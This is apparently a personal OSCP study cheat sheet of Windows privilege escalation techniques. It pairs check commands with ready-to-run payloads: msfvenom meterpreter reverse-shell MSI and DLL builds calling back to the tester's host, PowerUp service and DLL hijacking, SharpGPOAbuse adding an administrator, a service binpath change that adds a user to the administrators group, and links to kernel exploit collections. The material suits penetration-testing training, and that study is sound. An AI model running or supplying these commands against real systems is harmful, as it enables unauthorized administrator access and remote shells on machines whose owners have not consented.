Windows Privilege Escalation Methods

Below are some of the more common methods of privilege escalation that I have come across during the course of my OSCP journey.

SeImpersonatePrivilege

Check:

whoami /priv

Payload / Execution:

Unquoted Service Path

Check:

Invoke-AllChecks

sc qc servicename

Payload / Execution:

Service at:

C:\Program Files\New Service\service.exe

powerup:
Write-ServiceBinary -ServiceName 'New Service' -Path <HijackPath>

OR manually place payload at:
C:\Program.exe
OR
C:\Program Files\new.exe

Then, restart the service to execute the payload:

sc restart "New Service"

AlwaysInstallElevatated - Registry Escalation Exploitation

Check:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

Payload/Execution:

msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 -f msi -o exp.msi

GPO Abuse

Check:

powerview:
Get-NetGPO

Payload / Execution:

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount Administrator --GPOName "Default Domain Policy"

DLL Hijacking

Check:

powerup:
Invoke-AllChecks

Payload / Execution:

With powerup:
Write-HijackDll -DllPath 'C:\Program Files\program\func.dll

Manually:
msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=tun0 LPORT=443 > exp.dll

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=tun0 LPORT=443 > exp.dll

binPath

Check:

accesschk64.exe -wuvc daclsvc

Confirmation: - “SERVICE_CHANGE_CONFIG”

Payload / Execution:

sc config daclsvc binpath= "net localgroup administrators user /add
sc start daclsvc

Kernel Exploits:

https://github.com/Ascotbe/Kernelhub/tree/master/Windows

https://github.com/SecWiki/windows-kernel-exploits

Other Methods: